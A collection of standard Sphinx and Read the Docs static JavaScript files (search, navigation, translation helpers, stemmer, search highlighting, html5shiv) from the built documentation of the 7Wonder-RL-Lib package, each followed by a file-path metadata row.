const otherTerms = new Set(objectTerms);
otherTerms.delete(object);
if (otherTerms.size > 0) {
const haystack = `${prefix} ${name} ${objName} ${title}`.toLowerCase();
if (
[...otherTerms].some((otherTerm) => haystack.indexOf(otherTerm) < 0)
)
return;
}
let anchor = match[3];
if (anchor === "") anchor = fullname;
else if (anchor === "-") anchor = objNames[match[1]][1] + "-" + fullname;
const descr = objName + _(", in ") + title;
// add custom score for some objects according to scorer
if (Scorer.objPrio.hasOwnProperty(match[2]))
score += Scorer.objPrio[match[2]];
else score += Scorer.objPrioDefault;
results.push([
docNames[match[0]],
fullname,
"#" + anchor,
descr,
score,
filenames[match[0]],
]);
};
Object.keys(objects).forEach((prefix) =>
objects[prefix].forEach((array) =>
objectSearchCallback(prefix, array)
)
);
return results;
},
/**
* search for full-text terms in the index
*/
performTermsSearch: (searchTerms, excludedTerms) => {
// prepare search
const terms = Search._index.terms;
const titleTerms = Search._index.titleterms;
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const scoreMap = new Map();
const fileMap = new Map();
// perform the search on the required terms
searchTerms.forEach((word) => {
const files = [];
const arr = [
{ files: terms[word], score: Scorer.term },
{ files: titleTerms[word], score: Scorer.title },
];
// add support for partial matches
if (word.length > 2) {
const escapedWord = _escapeRegExp(word);
Object.keys(terms).forEach((term) => {
if (term.match(escapedWord) && !terms[word])
arr.push({ files: terms[term], score: Scorer.partialTerm });
});
Object.keys(titleTerms).forEach((term) => {
if (term.match(escapedWord) && !titleTerms[word])
arr.push({ files: titleTerms[word], score: Scorer.partialTitle });
});
}
// no match but word was a required one
if (arr.every((record) => record.files === undefined)) return;
// found search word in contents
arr.forEach((record) => {
if (record.files === undefined) return;
let recordFiles = record.files;
if (recordFiles.length === undefined) recordFiles = [recordFiles];
files.push(...recordFiles);
// set score for the word in each file
recordFiles.forEach((file) => {
if (!scoreMap.has(file)) scoreMap.set(file, {});
scoreMap.get(file)[word] = record.score;
});
});
// create the mapping
files.forEach((file) => {
if (fileMap.has(file) && fileMap.get(file).indexOf(word) === -1)
fileMap.get(file).push(word);
else fileMap.set(file, [word]);
});
});
// now check if the files don't contain excluded terms
const results = [];
for (const [file, wordList] of fileMap) {
// check if all requirements are matched
// as search terms with length < 3 are discarded
const filteredTermCount = [...searchTerms].filter(
(term) => term.length > 2
).length;
if (
wordList.length !== searchTerms.size &&
wordList.length !== filteredTermCount
)
continue;
// ensure that none of the excluded terms is in the search result
if (
[...excludedTerms].some(
(term) =>
terms[term] === file ||
titleTerms[term] === file ||
(terms[term] || []).includes(file) ||
(titleTerms[term] || []).includes(file)
)
)
break;
// select one (max) score for the file.
const score = Math.max(...wordList.map((w) => scoreMap.get(file)[w]));
// add result to the result list
results.push([
docNames[file],
titles[file],
"",
null,
score,
filenames[file],
]);
}
return results;
},
/**
* helper function to return a node containing the
* search summary for a given text. keywords is a list
* of stemmed words.
*/
makeSearchSummary: (htmlText, keywords) => {
const text = Search.htmlToText(htmlText);
if (text === "") return null;
const textLower = text.toLowerCase();
const actualStartPosition = [...keywords]
.map((k) => textLower.indexOf(k.toLowerCase()))
.filter((i) => i > -1)
.slice(-1)[0];
const startWithContext = Math.max(actualStartPosition - 120, 0);
const top = startWithContext === 0 ? "" : "...";
const tail = startWithContext + 240 < text.length ? "..." : "";
let summary = document.createElement("p");
summary.classList.add("context");
summary.textContent = top + text.substr(startWithContext, 240).trim() + tail;
return summary;
},
};
_ready(Search.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/searchtools.js | searchtools.js |
!function(n){var e={};function t(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return n[i].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=n,t.c=e,t.d=function(n,e,i){t.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:i})},t.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,e){if(1&e&&(n=t(n)),8&e)return n;if(4&e&&"object"==typeof n&&n&&n.__esModule)return n;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:n}),2&e&&"string"!=typeof n)for(var o in n)t.d(i,o,function(e){return n[e]}.bind(null,o));return i},t.n=function(n){var e=n&&n.__esModule?function(){return n.default}:function(){return n};return t.d(e,"a",e),e},t.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},t.p="",t(t.s=0)}([function(n,e,t){t(1),n.exports=t(3)},function(n,e,t){(function(){var e="undefined"!=typeof window?window.jQuery:t(2);n.exports.ThemeNav={navBar:null,win:null,winScroll:!1,winResize:!1,linkScroll:!1,winPosition:0,winHeight:null,docHeight:null,isRunning:!1,enable:function(n){var t=this;void 0===n&&(n=!0),t.isRunning||(t.isRunning=!0,e((function(e){t.init(e),t.reset(),t.win.on("hashchange",t.reset),n&&t.win.on("scroll",(function(){t.linkScroll||t.winScroll||(t.winScroll=!0,requestAnimationFrame((function(){t.onScroll()})))})),t.win.on("resize",(function(){t.winResize||(t.winResize=!0,requestAnimationFrame((function(){t.onResize()})))})),t.onResize()})))},enableSticky:function(){this.enable(!0)},init:function(n){n(document);var e=this;this.navBar=n("div.wy-side-scroll:first"),this.win=n(window),n(document).on("click","[data-toggle='wy-nav-top']",(function(){n("[data-toggle='wy-nav-shift']").toggleClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift")})).on("click",".wy-menu-vertical .current ul li a",(function(){var t=n(this);n("[data-toggle='wy-nav-shift']").removeClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift"),e.toggleCurrent(t),e.hashChange()})).on("click","[data-toggle='rst-current-version']",(function(){n("[data-toggle='rst-versions']").toggleClass("shift-up")})),n("table.docutils:not(.field-list,.footnote,.citation)").wrap("<div class='wy-table-responsive'></div>"),n("table.docutils.footnote").wrap("<div class='wy-table-responsive footnote'></div>"),n("table.docutils.citation").wrap("<div class='wy-table-responsive citation'></div>"),n(".wy-menu-vertical ul").not(".simple").siblings("a").each((function(){var t=n(this);expand=n('<button class="toctree-expand" title="Open/close menu"></button>'),expand.on("click",(function(n){return e.toggleCurrent(t),n.stopPropagation(),!1})),t.prepend(expand)}))},reset:function(){var n=encodeURI(window.location.hash)||"#";try{var e=$(".wy-menu-vertical"),t=e.find('[href="'+n+'"]');if(0===t.length){var i=$('.document [id="'+n.substring(1)+'"]').closest("div.section");0===(t=e.find('[href="#'+i.attr("id")+'"]')).length&&(t=e.find('[href="#"]'))}if(t.length>0){$(".wy-menu-vertical .current").removeClass("current").attr("aria-expanded","false"),t.addClass("current").attr("aria-expanded","true"),t.closest("li.toctree-l1").parent().addClass("current").attr("aria-expanded","true");for(let n=1;n<=10;n++)t.closest("li.toctree-l"+n).addClass("current").attr("aria-expanded","true");t[0].scrollIntoView()}}catch(n){console.log("Error expanding nav for anchor",n)}},onScroll:function(){this.winScroll=!1;var n=this.win.scrollTop(),e=n+this.winHeight,t=this.navBar.scrollTop()+(n-this.winPosition);n<0||e>this.docHeight||(this.navBar.scrollTop(t),this.winPosition=n)},onResize:function(){this.winResize=!1,this.winHeight=this.win.height(),this.docHeight=$(document).height()},hashChange:function(){this.linkScroll=!0,this.win.one("hashchange",(function(){this.linkScroll=!1}))},toggleCurrent:function(n){var e=n.closest("li");e.siblings("li.current").removeClass("current").attr("aria-expanded","false"),e.siblings().find("li.current").removeClass("current").attr("aria-expanded","false");var t=e.find("> ul li");t.length&&(t.removeClass("current").attr("aria-expanded","false"),e.toggleClass("current").attr("aria-expanded",(function(n,e){return"true"==e?"false":"true"})))}},"undefined"!=typeof window&&(window.SphinxRtdTheme={Navigation:n.exports.ThemeNav,StickyNav:n.exports.ThemeNav}),function(){for(var n=0,e=["ms","moz","webkit","o"],t=0;t<e.length&&!window.requestAnimationFrame;++t)window.requestAnimationFrame=window[e[t]+"RequestAnimationFrame"],window.cancelAnimationFrame=window[e[t]+"CancelAnimationFrame"]||window[e[t]+"CancelRequestAnimationFrame"];window.requestAnimationFrame||(window.requestAnimationFrame=function(e,t){var i=(new Date).getTime(),o=Math.max(0,16-(i-n)),r=window.setTimeout((function(){e(i+o)}),o);return n=i+o,r}),window.cancelAnimationFrame||(window.cancelAnimationFrame=function(n){clearTimeout(n)})}()}).call(window)},function(n,e){n.exports=jQuery},function(n,e,t){}]); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/js/theme.js | theme.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=y.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=y.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),y.elements=c+" "+a,j(b)}function f(a){var b=x[a[v]];return b||(b={},w++,a[v]=w,x[w]=b),b}function g(a,c,d){if(c||(c=b),q)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():u.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||t.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),q)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return y.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(y,b.frag)}function j(a){a||(a=b);var d=f(a);return!y.shivCSS||p||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),q||i(a,d),a}function k(a){for(var b,c=a.getElementsByTagName("*"),e=c.length,f=RegExp("^(?:"+d().join("|")+")$","i"),g=[];e--;)b=c[e],f.test(b.nodeName)&&g.push(b.applyElement(l(b)));return g}function l(a){for(var b,c=a.attributes,d=c.length,e=a.ownerDocument.createElement(A+":"+a.nodeName);d--;)b=c[d],b.specified&&e.setAttribute(b.nodeName,b.nodeValue);return e.style.cssText=a.style.cssText,e}function m(a){for(var b,c=a.split("{"),e=c.length,f=RegExp("(^|[\\s,>+~])("+d().join("|")+")(?=[[\\s,>+~#.:]|$)","gi"),g="$1"+A+"\\:$2";e--;)b=c[e]=c[e].split("}"),b[b.length-1]=b[b.length-1].replace(f,g),c[e]=b.join("}");return c.join("{")}function n(a){for(var b=a.length;b--;)a[b].removeNode()}function o(a){function b(){clearTimeout(g._removeSheetTimer),d&&d.removeNode(!0),d=null}var d,e,g=f(a),h=a.namespaces,i=a.parentWindow;return!B||a.printShived?a:("undefined"==typeof h[A]&&h.add(A),i.attachEvent("onbeforeprint",function(){b();for(var f,g,h,i=a.styleSheets,j=[],l=i.length,n=Array(l);l--;)n[l]=i[l];for(;h=n.pop();)if(!h.disabled&&z.test(h.media)){try{f=h.imports,g=f.length}catch(o){g=0}for(l=0;g>l;l++)n.push(f[l]);try{j.push(h.cssText)}catch(o){}}j=m(j.reverse().join("")),e=k(a),d=c(a,j)}),i.attachEvent("onafterprint",function(){n(e),clearTimeout(g._removeSheetTimer),g._removeSheetTimer=setTimeout(b,500)}),a.printShived=!0,a)}var p,q,r="3.7.3",s=a.html5||{},t=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,u=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,v="_html5shiv",w=0,x={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",p="hidden"in a,q=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){p=!0,q=!0}}();var y={elements:s.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:r,shivCSS:s.shivCSS!==!1,supportsUnknownElements:q,shivMethods:s.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=y,j(b);var z=/^$|\b(?:all|print)\b/,A="html5shiv",B=!q&&function(){var c=b.documentElement;return!("undefined"==typeof b.namespaces||"undefined"==typeof b.parentWindow||"undefined"==typeof c.applyElement||"undefined"==typeof c.removeNode||"undefined"==typeof a.attachEvent)}();y.type+=" print",y.shivPrint=o,o(b),"object"==typeof module&&module.exports&&(module.exports=y)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/js/html5shiv-printshiv.min.js | html5shiv-printshiv.min.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c+" "+a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r++,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),l||i(a,d),a}var k,l,m="3.7.3-pre",n=a.html5||{},o=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,p=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,q="_html5shiv",r=0,s={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",k="hidden"in a,l=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){k=!0,l=!0}}();var t={elements:n.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:m,shivCSS:n.shivCSS!==!1,supportsUnknownElements:l,shivMethods:n.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),"object"==typeof module&&module.exports&&(module.exports=t)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/js/html5shiv.min.js | html5shiv.min.js |
"use strict";
const BLACKLISTED_KEY_CONTROL_ELEMENTS = new Set([
"TEXTAREA",
"INPUT",
"SELECT",
"BUTTON",
]);
const _ready = (callback) => {
if (document.readyState !== "loading") {
callback();
} else {
document.addEventListener("DOMContentLoaded", callback);
}
};
/**
* Small JavaScript module for the documentation.
*/
const Documentation = {
init: () => {
Documentation.initDomainIndexTable();
Documentation.initOnKeyListeners();
},
/**
* i18n support
*/
TRANSLATIONS: {},
PLURAL_EXPR: (n) => (n === 1 ? 0 : 1),
LOCALE: "unknown",
// gettext and ngettext don't access this so that the functions
// can safely bound to a different name (_ = Documentation.gettext)
gettext: (string) => {
const translated = Documentation.TRANSLATIONS[string];
switch (typeof translated) {
case "undefined":
return string; // no translation
case "string":
return translated; // translation exists
default:
return translated[0]; // (singular, plural) translation tuple exists
}
},
ngettext: (singular, plural, n) => {
const translated = Documentation.TRANSLATIONS[singular];
if (typeof translated !== "undefined")
return translated[Documentation.PLURAL_EXPR(n)];
return n === 1 ? singular : plural;
},
addTranslations: (catalog) => {
Object.assign(Documentation.TRANSLATIONS, catalog.messages);
Documentation.PLURAL_EXPR = new Function(
"n",
`return (${catalog.plural_expr})`
);
Documentation.LOCALE = catalog.locale;
},
/**
* helper function to focus on search bar
*/
focusSearchBar: () => {
document.querySelectorAll("input[name=q]")[0]?.focus();
},
/**
* Initialise the domain index toggle buttons
*/
initDomainIndexTable: () => {
const toggler = (el) => {
const idNumber = el.id.substr(7);
const toggledRows = document.querySelectorAll(`tr.cg-${idNumber}`);
if (el.src.substr(-9) === "minus.png") {
el.src = `${el.src.substr(0, el.src.length - 9)}plus.png`;
toggledRows.forEach((el) => (el.style.display = "none"));
} else {
el.src = `${el.src.substr(0, el.src.length - 8)}minus.png`;
toggledRows.forEach((el) => (el.style.display = ""));
}
};
const togglerElements = document.querySelectorAll("img.toggler");
togglerElements.forEach((el) =>
el.addEventListener("click", (event) => toggler(event.currentTarget))
);
togglerElements.forEach((el) => (el.style.display = ""));
if (DOCUMENTATION_OPTIONS.COLLAPSE_INDEX) togglerElements.forEach(toggler);
},
initOnKeyListeners: () => {
// only install a listener if it is really needed
if (
!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS &&
!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS
)
return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.altKey || event.ctrlKey || event.metaKey) return;
if (!event.shiftKey) {
switch (event.key) {
case "ArrowLeft":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const prevLink = document.querySelector('link[rel="prev"]');
if (prevLink && prevLink.href) {
window.location.href = prevLink.href;
event.preventDefault();
}
break;
case "ArrowRight":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const nextLink = document.querySelector('link[rel="next"]');
if (nextLink && nextLink.href) {
window.location.href = nextLink.href;
event.preventDefault();
}
break;
}
}
// some keyboard layouts may need Shift to get /
switch (event.key) {
case "/":
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) break;
Documentation.focusSearchBar();
event.preventDefault();
}
});
},
};
// quick alias for translations
const _ = Documentation.gettext;
_ready(Documentation.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/doctools.js | doctools.js |
var stopwords = ["a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "near", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"];
/* Non-minified version is copied as a separate JS file, is available */
/**
* Porter Stemmer
*/
var Stemmer = function() {
var step2list = {
ational: 'ate',
tional: 'tion',
enci: 'ence',
anci: 'ance',
izer: 'ize',
bli: 'ble',
alli: 'al',
entli: 'ent',
eli: 'e',
ousli: 'ous',
ization: 'ize',
ation: 'ate',
ator: 'ate',
alism: 'al',
iveness: 'ive',
fulness: 'ful',
ousness: 'ous',
aliti: 'al',
iviti: 'ive',
biliti: 'ble',
logi: 'log'
};
var step3list = {
icate: 'ic',
ative: '',
alize: 'al',
iciti: 'ic',
ical: 'ic',
ful: '',
ness: ''
};
var c = "[^aeiou]"; // consonant
var v = "[aeiouy]"; // vowel
var C = c + "[^aeiouy]*"; // consonant sequence
var V = v + "[aeiou]*"; // vowel sequence
var mgr0 = "^(" + C + ")?" + V + C; // [C]VC... is m>0
var meq1 = "^(" + C + ")?" + V + C + "(" + V + ")?$"; // [C]VC[V] is m=1
var mgr1 = "^(" + C + ")?" + V + C + V + C; // [C]VCVC... is m>1
var s_v = "^(" + C + ")?" + v; // vowel in stem
this.stemWord = function (w) {
var stem;
var suffix;
var firstch;
var origword = w;
if (w.length < 3)
return w;
var re;
var re2;
var re3;
var re4;
firstch = w.substr(0,1);
if (firstch == "y")
w = firstch.toUpperCase() + w.substr(1);
// Step 1a
re = /^(.+?)(ss|i)es$/;
re2 = /^(.+?)([^s])s$/;
if (re.test(w))
w = w.replace(re,"$1$2");
else if (re2.test(w))
w = w.replace(re2,"$1$2");
// Step 1b
re = /^(.+?)eed$/;
re2 = /^(.+?)(ed|ing)$/;
if (re.test(w)) {
var fp = re.exec(w);
re = new RegExp(mgr0);
if (re.test(fp[1])) {
re = /.$/;
w = w.replace(re,"");
}
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1];
re2 = new RegExp(s_v);
if (re2.test(stem)) {
w = stem;
re2 = /(at|bl|iz)$/;
re3 = new RegExp("([^aeiouylsz])\\1$");
re4 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re2.test(w))
w = w + "e";
else if (re3.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
else if (re4.test(w))
w = w + "e";
}
}
// Step 1c
re = /^(.+?)y$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(s_v);
if (re.test(stem))
w = stem + "i";
}
// Step 2
re = /^(.+?)(ational|tional|enci|anci|izer|bli|alli|entli|eli|ousli|ization|ation|ator|alism|iveness|fulness|ousness|aliti|iviti|biliti|logi)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step2list[suffix];
}
// Step 3
re = /^(.+?)(icate|ative|alize|iciti|ical|ful|ness)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step3list[suffix];
}
// Step 4
re = /^(.+?)(al|ance|ence|er|ic|able|ible|ant|ement|ment|ent|ou|ism|ate|iti|ous|ive|ize)$/;
re2 = /^(.+?)(s|t)(ion)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
if (re.test(stem))
w = stem;
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1] + fp[2];
re2 = new RegExp(mgr1);
if (re2.test(stem))
w = stem;
}
// Step 5
re = /^(.+?)e$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
re2 = new RegExp(meq1);
re3 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re.test(stem) || (re2.test(stem) && !(re3.test(stem))))
w = stem;
}
re = /ll$/;
re2 = new RegExp(mgr1);
if (re.test(w) && re2.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
// and turn initial Y back to y
if (firstch == "y")
w = firstch.toLowerCase() + w.substr(1);
return w;
}
} | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/language_data.js | language_data.js |
"use strict";
const SPHINX_HIGHLIGHT_ENABLED = true
/**
* highlight a given string on a node by wrapping it in
* span elements with the given class name.
*/
const _highlight = (node, addItems, text, className) => {
if (node.nodeType === Node.TEXT_NODE) {
const val = node.nodeValue;
const parent = node.parentNode;
const pos = val.toLowerCase().indexOf(text);
if (
pos >= 0 &&
!parent.classList.contains(className) &&
!parent.classList.contains("nohighlight")
) {
let span;
const closestNode = parent.closest("body, svg, foreignObject");
const isInSVG = closestNode && closestNode.matches("svg");
if (isInSVG) {
span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");
} else {
span = document.createElement("span");
span.classList.add(className);
}
span.appendChild(document.createTextNode(val.substr(pos, text.length)));
parent.insertBefore(
span,
parent.insertBefore(
document.createTextNode(val.substr(pos + text.length)),
node.nextSibling
)
);
node.nodeValue = val.substr(0, pos);
if (isInSVG) {
const rect = document.createElementNS(
"http://www.w3.org/2000/svg",
"rect"
);
const bbox = parent.getBBox();
rect.x.baseVal.value = bbox.x;
rect.y.baseVal.value = bbox.y;
rect.width.baseVal.value = bbox.width;
rect.height.baseVal.value = bbox.height;
rect.setAttribute("class", className);
addItems.push({ parent: parent, target: rect });
}
}
} else if (node.matches && !node.matches("button, select, textarea")) {
node.childNodes.forEach((el) => _highlight(el, addItems, text, className));
}
};
const _highlightText = (thisNode, text, className) => {
let addItems = [];
_highlight(thisNode, addItems, text, className);
addItems.forEach((obj) =>
obj.parent.insertAdjacentElement("beforebegin", obj.target)
);
};
/**
* Small JavaScript module for the documentation.
*/
const SphinxHighlight = {
/**
* highlight the search words provided in localstorage in the text
*/
highlightSearchWords: () => {
if (!SPHINX_HIGHLIGHT_ENABLED) return; // bail if no highlight
// get and clear terms from localstorage
const url = new URL(window.location);
const highlight =
localStorage.getItem("sphinx_highlight_terms")
|| url.searchParams.get("highlight")
|| "";
localStorage.removeItem("sphinx_highlight_terms")
url.searchParams.delete("highlight");
window.history.replaceState({}, "", url);
// get individual terms from highlight string
const terms = highlight.toLowerCase().split(/\s+/).filter(x => x);
if (terms.length === 0) return; // nothing to do
// There should never be more than one element matching "div.body"
const divBody = document.querySelectorAll("div.body");
const body = divBody.length ? divBody[0] : document.querySelector("body");
window.setTimeout(() => {
terms.forEach((term) => _highlightText(body, term, "highlighted"));
}, 10);
const searchBox = document.getElementById("searchbox");
if (searchBox === null) return;
searchBox.appendChild(
document
.createRange()
.createContextualFragment(
'<p class="highlight-link">' +
'<a href="javascript:SphinxHighlight.hideSearchWords()">' +
_("Hide Search Matches") +
"</a></p>"
)
);
},
/**
* helper function to hide the search marks again
*/
hideSearchWords: () => {
document
.querySelectorAll("#searchbox .highlight-link")
.forEach((el) => el.remove());
document
.querySelectorAll("span.highlighted")
.forEach((el) => el.classList.remove("highlighted"));
localStorage.removeItem("sphinx_highlight_terms")
},
initEscapeListener: () => {
// only install a listener if it is really needed
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.shiftKey || event.altKey || event.ctrlKey || event.metaKey) return;
if (DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS && (event.key === "Escape")) {
SphinxHighlight.hideSearchWords();
event.preventDefault();
}
});
},
};
_ready(SphinxHighlight.highlightSearchWords);
_ready(SphinxHighlight.initEscapeListener); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/sphinx_highlight.js | sphinx_highlight.js |
"use strict";
/**
* Simple result scoring code.
*/
if (typeof Scorer === "undefined") {
var Scorer = {
// Implement the following function to further tweak the score for each result
// The function takes a result array [docname, title, anchor, descr, score, filename]
// and returns the new score.
/*
score: result => {
const [docname, title, anchor, descr, score, filename] = result
return score
},
*/
// query matches the full name of an object
objNameMatch: 11,
// or matches in the last dotted part of the object name
objPartialMatch: 6,
// Additive scores depending on the priority of the object
objPrio: {
0: 15, // used to be importantResults
1: 5, // used to be objectResults
2: -5, // used to be unimportantResults
},
// Used when the priority is not in the mapping.
objPrioDefault: 0,
// query found in title
title: 15,
partialTitle: 7,
// query found in terms
term: 5,
partialTerm: 2,
};
}
const _removeChildren = (element) => {
while (element && element.lastChild) element.removeChild(element.lastChild);
};
/**
* See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#escaping
*/
const _escapeRegExp = (string) =>
string.replace(/[.*+\-?^${}()|[\]\\]/g, "\\$&"); // $& means the whole matched string
const _displayItem = (item, searchTerms) => {
const docBuilder = DOCUMENTATION_OPTIONS.BUILDER;
const docUrlRoot = DOCUMENTATION_OPTIONS.URL_ROOT;
const docFileSuffix = DOCUMENTATION_OPTIONS.FILE_SUFFIX;
const docLinkSuffix = DOCUMENTATION_OPTIONS.LINK_SUFFIX;
const showSearchSummary = DOCUMENTATION_OPTIONS.SHOW_SEARCH_SUMMARY;
const [docName, title, anchor, descr, score, _filename] = item;
let listItem = document.createElement("li");
let requestUrl;
let linkUrl;
if (docBuilder === "dirhtml") {
// dirhtml builder
let dirname = docName + "/";
if (dirname.match(/\/index\/$/))
dirname = dirname.substring(0, dirname.length - 6);
else if (dirname === "index/") dirname = "";
requestUrl = docUrlRoot + dirname;
linkUrl = requestUrl;
} else {
// normal html builders
requestUrl = docUrlRoot + docName + docFileSuffix;
linkUrl = docName + docLinkSuffix;
}
let linkEl = listItem.appendChild(document.createElement("a"));
linkEl.href = linkUrl + anchor;
linkEl.dataset.score = score;
linkEl.innerHTML = title;
if (descr)
listItem.appendChild(document.createElement("span")).innerHTML =
